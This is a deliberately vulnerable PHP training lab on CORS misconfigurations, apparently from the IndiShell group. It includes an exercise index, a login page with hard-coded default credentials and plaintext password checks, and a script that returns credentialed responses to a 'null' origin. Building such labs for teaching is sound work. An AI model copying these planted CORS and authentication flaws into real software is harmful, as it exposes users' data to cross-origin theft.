 24 | background-image: url(images/matrix2.gif);
 25 | background-repeat: repeat;
 26 | }
 27 | 
 28 | #title {
 29 |     font-size: 2em;
 30 |     padding-top: 5px;
 31 | 	font-family: consolas, georgia, helvetica, times new roman, serif;
 32 | }
 33 | 
 34 | 
 35 | tr {
 36 | border-collapse: collapse;
 37 | }
 38 | 
 39 | td {
 40 | font-family: consolas, georgia, helvetica, times new roman, serif;
 41 | border-collapse: collapse;
 42 | }
 43 | 
 44 | table {
 45 | 		margin-left:auto;
 46 | 		margin-right:auto;
 47 | 		BORDER: dashed 2px #333;
 48 | 		BORDER-COLOR: #333333;
 49 | 		BACKGROUND-COLOR: #191919;;
 50 | 		color: #FFF;
 51 | }
 52 | 
 53 | A:link {
 54 | border: 1px;
 55 | 	COLOR: red; TEXT-DECORATION: none
 56 | }
 57 | A:visited {
 58 | 	COLOR: red; TEXT-DECORATION: none
 59 | }
 60 | A:hover {
 61 | 	color: #97c3f5; TEXT-DECORATION: none
 62 | }
 63 | A:active {
 64 | 	color: ; TEXT-DECORATION: none
 65 | }
 66 | </STYLE>
 67 | 
 68 | <script type="text/javascript">
 69 | 
 70 |     function lhook(id) {
 71 | 
 72 |        var e = document.getElementById(id);
 73 | 
 74 |        if(e.style.display == 'block')
 75 | 
 76 |           e.style.display = 'none';
 77 | 
 78 |        else
 79 | 
 80 |           e.style.display = 'block';
 81 | 
 82 |     }
 83 | </script>
 84 | 
 85 | <form method=POST>
 86 | 
 87 | 		<input type=submit name=logout value="Logout"></form>
 88 | 		
 89 | <div id="title" align=center>--==[[ Welcome to the CORS Misconfiguration Lab ]]==--</div>
 90 | <br>
 91 | Exercises:
 92 | <br>
 93 | <table width="90%"><tr><td>
 94 | <b><font color=#ff9933 size="3">1. Application Trust Arbitrary Origin: -</font></b></td></tr>
 95 | <tr><td style="background-color: #343440;">
 96 | <div align=center>--== <a href="#" onclick="lhook('info1');" style="border:1px;background:black;">Billu, Show Misconfiguration Info</a> ==--
 97 | </div>
 98 | 
 99 | <div id="info1" style="display:none;">
100 | Application accept CORS request from any Origin. The code put the "Origin" value in HTTP response header "Access-Control-Allow-Origin". Now, this configuration will allow any script from any "Origin" to make CORS request to application. Web browser will perform standard CORS request checks and Script from malicious domain will be able to steal the data. </div></td></tr>
101 | <tr><td>Link to Vulnerable Script - <a href="arbitrary_origin.php" target="_blank">arbitrary_origin.php</a></td></tr></table>
102 | <br><br>
103 | <table  width="90%" >
104 | <tr><td>
105 | <b><font color=#ff9933 size="3">2. Application has bad "regex" Implementation to check Trusted Origin : -</font></b> </td></tr>
106 | <tr><td style="background-color: #343440; ">
107 | <div align=center>--== <a href="#" onclick="lhook('info2');" style="border:1px;background:black;">Billu, Show Misconfiguration Info</a> ==--
108 | </div>
109 | 
110 | <div id="info2" style="display:none;">
111 | Application has CORS policy implemented and perform "Regex" check for whitelisted Domain/Sub-domains. In this scenario, application has weak regex implementation in code which just check for presence of domain name "b0x.com" anywhere in HTTP request "Origin" header. If HTTP header "Origin" has value "inb0x.com" or b0x.comlab.com, regex will mark it pass. This misconfiguration will lead to sharing of data over cross origin.
112 | </div>
113 | </td></tr>
114 | <tr><td>
115 | Link to Vulnerable Script - <a href="bad_regex.php" target="_blank">bad_regex.php</a></td></tr></table>
116 | <br><br>
117 | <table  width="90%">
118 | <tr><td>
119 | <b><font color=#ff9933 size="3">3. Application Trust "null" Origin: -</font></b> </td></tr>
120 | <tr><td style="background-color: #343440;"> 
121 | <div align=center>--== <a href="#" onclick="lhook('info3');" style="border:1px;background:black;">Billu, Show Misconfiguration Info</a> ==--
122 | </div>
123 | 
124 | <div id="info3" style="display:none;">
125 | In this scenario, application HTTP response header "Access-Control-Allow-Origin" is always set to "null". When user specify any value other than null, application does not process it and keep reflecting "null" in HTTP response. There are few tricks which allow an attacker to perform exploitation and can ex-filtrate data of victim using CORS request. </div></td></tr>
126 | <tr><td>Link to Vulnerable Script - <a href="null_origin.php" target="_blank">null_origin.php</a>
127 | </td></tr></table>  
128 | 
129 | 


--------------------------------------------------------------------------------
/login.php:
--------------------------------------------------------------------------------
  1 | <?php 
  2 | session_start();
  3 | include('c0nnection.php');
  4 | 
  5 | if(isset($_POST['login']))
  6 | 	{
  7 | 	
  8 |      $uname=mysqli_real_escape_string($conn,@$_POST['username']);
  9 |      $pass=mysqli_real_escape_string($conn,@$_POST['password']);
 10 |      $run='select * from auth where username=\''.$uname.'\' and  password=\''.$pass.'\'';
 11 |      $result = mysqli_query($conn, $run);
 12 |  if (mysqli_num_rows($result) > 0) {
 13 | 
 14 |  $row = mysqli_fetch_assoc($result);
 15 |         $_SESSION['logged2']=true;
 16 |        
 17 | 		     header('Location: index.php', true, 302);
 18 | 	  }
 19 | 	  
 20 | else
 21 | {
 22 | echo "<script>alert('Are you sure, username/password was correct??');</script>";
 23 | }
 24 | }
 25 | 
 26 | echo '<html>
 27 | <head>
 28 | <link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
 29 | </script>
 30 | <title>--==[[Mannu Sh3LL]]==--</title>
 31 | <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 32 | <STYLE>
 33 | body {
 34 | background: url(images/head.jpg);
 35 | 	background-size: 100% 700px;
 36 | font-family: Tahoma;
 37 | color: white;
 38 | }
 39 | input {
 40 | border			: solid 2px ;
 41 | border-color		: black;
 42 | BACKGROUND-COLOR: #444444;
 43 | font: 8pt Verdana;
 44 | color: white;
 45 | }
 46 | submit {
 47 | BORDER:  buttonhighlight 2px outset;
 48 | BACKGROUND-COLOR: Black;
 49 | width: 30%;
 50 | color: #FFF;
 51 | }
 52 | #t input[type=\'submit\']{
 53 | 	COLOR: White;
 54 | 	border:none;
 55 | 	BACKGROUND-COLOR: black;
 56 | }
 57 | #t input[type=\'submit\']:hover {
 58 | 	
 59 | 	BACKGROUND-COLOR: #ff9933;
 60 | 	color: black;
 61 | 	
 62 | }
 63 | tr {
 64 | BORDER: dashed 1px #333;
 65 | color: #FFF;
 66 | }
 67 | td {
 68 | BORDER: dashed 0px ;
 69 | }
 70 | .table1 {
 71 | BORDER: 0px Black;
 72 | BACKGROUND-COLOR: Black;
 73 | color: #FFF;
 74 | }
 75 | .td1 {
 76 | BORDER: 0px;
 77 | BORDER-COLOR: #333333;
 78 | font: 7pt Verdana;
 79 | color: Green;
 80 | }
 81 | .tr1 {
 82 | BORDER: 0px;
 83 | BORDER-COLOR: #333333;
 84 | color: #FFF;
 85 | }
 86 | table {
 87 | BORDER: dashed 2px #333;
 88 | BORDER-COLOR: #333333;
 89 | BACKGROUND-COLOR: #191919;;
 90 | color: #FFF;
 91 | }
 92 | textarea {
 93 | border			: dashed 2px #333;
 94 | BACKGROUND-COLOR: Black;
 95 | font: Fixedsys bold;
 96 | color: #999;
 97 | }
 98 | A:link {
 99 | border: 1px;
100 | 	COLOR: red; TEXT-DECORATION: none
101 | }
102 | A:visited {
103 | 	COLOR: red; TEXT-DECORATION: none
104 | }
105 | A:hover {
106 | 	color: White; TEXT-DECORATION: none
107 | }
108 | A:active {
109 | 	color: white; TEXT-DECORATION: none
110 | }
111 | </STYLE>
112 | <script type="text/javascript">
113 | <!--
114 |     function lhook(id) {
115 |        var e = document.getElementById(id);
116 |        if(e.style.display == \'block\')
117 |           e.style.display = \'none\';
118 |        else
119 |           e.style.display = \'block\';
120 |     }
121 | //-->
122 | </script>
123 | ';
124 | 
125 | 
126 | if(@$_SESSION['logged2']!=true)
127 | {
128 | 	$_SESSION['logged2']='';
129 | }
130 | if($_SESSION['logged2']===true)
131 | {
132 | 	header('Location: index.php', true, 302);
133 | }
134 | 
135 | 
136 | else 
137 | {
138 | echo '<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
139 | 			
140 |          <td width="100%" align=center valign="top" rowspan="1">
141 |            <font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mis-confi</font><font color=white size=5 face="comic sans ms"><b>gured CORS </font><font color=green size=5 face="comic sans ms"><b>Policy  Lab]]==--</font><br>
142 | 			<font color=#ff9933 size=3 face="comic sans ms"><b>--==[[ With </font><font color=white size=3 face="comic sans ms"><b>Love From IndiShell</font><font color=green size=3 face="comic sans ms"><b> Crew]]==--</font>
143 | 		   <div class="hedr"> 
144 |         <td height="10" align="left" class="td1"></td></tr><tr><td 
145 |         width="100%" align="center" valign="top" rowspan="1"><font 
146 |         color="red" face="comic sans ms"size="1"> 
147 |         <font color=#ff9933> 
148 |         ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
149 |         -==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero, Code breaker ICA, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba Silent poison India, Magnum sniper, 3thicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad, <br>
150 | Hackuin, Alicks, mike waals, cyber gladiator, Cyber Ace, Golden boy INDIA, d3, rafay baloch, nag256,
151 | Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, D2, Bikash Dash and rest of TEAM INDISHELL<br>
152 | <font color=white>--==[[Love to]]==--</font><br># My Father, my Ex Teacher, cold fire hacker, Mannu, ViKi, Ashu bhai ji, Soldier Of God, Bhuppi, Gujjar PCP,
153 | Mohit, Ffe, Shardhanand, Budhaoo, Jagriti, Hacker fantastic, Jennifer Arcuri, Thecolonial and Don(Deepika kaushik) <br>
154 |         <b> 
155 |         <font color=#ff9933> 
156 |         ##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
157 | 						
158 |            </table>
159 |        </table> 
160 | <div align=center style="margin:30px 0px 0px 0px;">
161 | 
162 | 
163 | Login 
164 | 
165 | <br><br>
166 | <form method=POST>
167 | Username <input type=text name=username value="ace">	&nbsp Password <input type=password name=password value="fire"><br><br>
168 | <input type=submit name=login value="Let me In =))">
169 | </form>';
170 | }
171 | 
172 | 
173 | ?>
174 | <style type="text/css">#cot_tl_fixed{background-color:black;position:fixed;bottom:0px;font-Asize:50px;left:0px;padding:3px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}</style>
175 | <span style="color: white;">
176 | <div id="cot_tl_fixed"><marquee>Coded By:- 1046 @ IndiShell Lab</marquee></div></span>
177 | 


--------------------------------------------------------------------------------
/null_origin.php:
--------------------------------------------------------------------------------
 1 | <?php 
 2 | session_start();
 3 | header( 'b0x-Powered-By: White beard Pirates 8-)' );
 4 | header('Access-Control-Allow-Origin: null');
 5 | 
 6 | header('Access-Control-Allow-Credentials: true');
 7 | 
 8 | 
 9 | 
10 | if($_SESSION['logged2']!=true)
11 | {
12 | header('Location: login.php', true, 302);
13 | exit;
14 | }
15 | 
16 | 
17 | echo '<div align=center style="margin: 30px;">Welcome, Fetch the HTTP response of this web page using CORS request and That\'s all \m/ because "null" "Origin" is not trustworthy</div>';
18 | 
19 | 
20 | 
21 | 


--------------------------------------------------------------------------------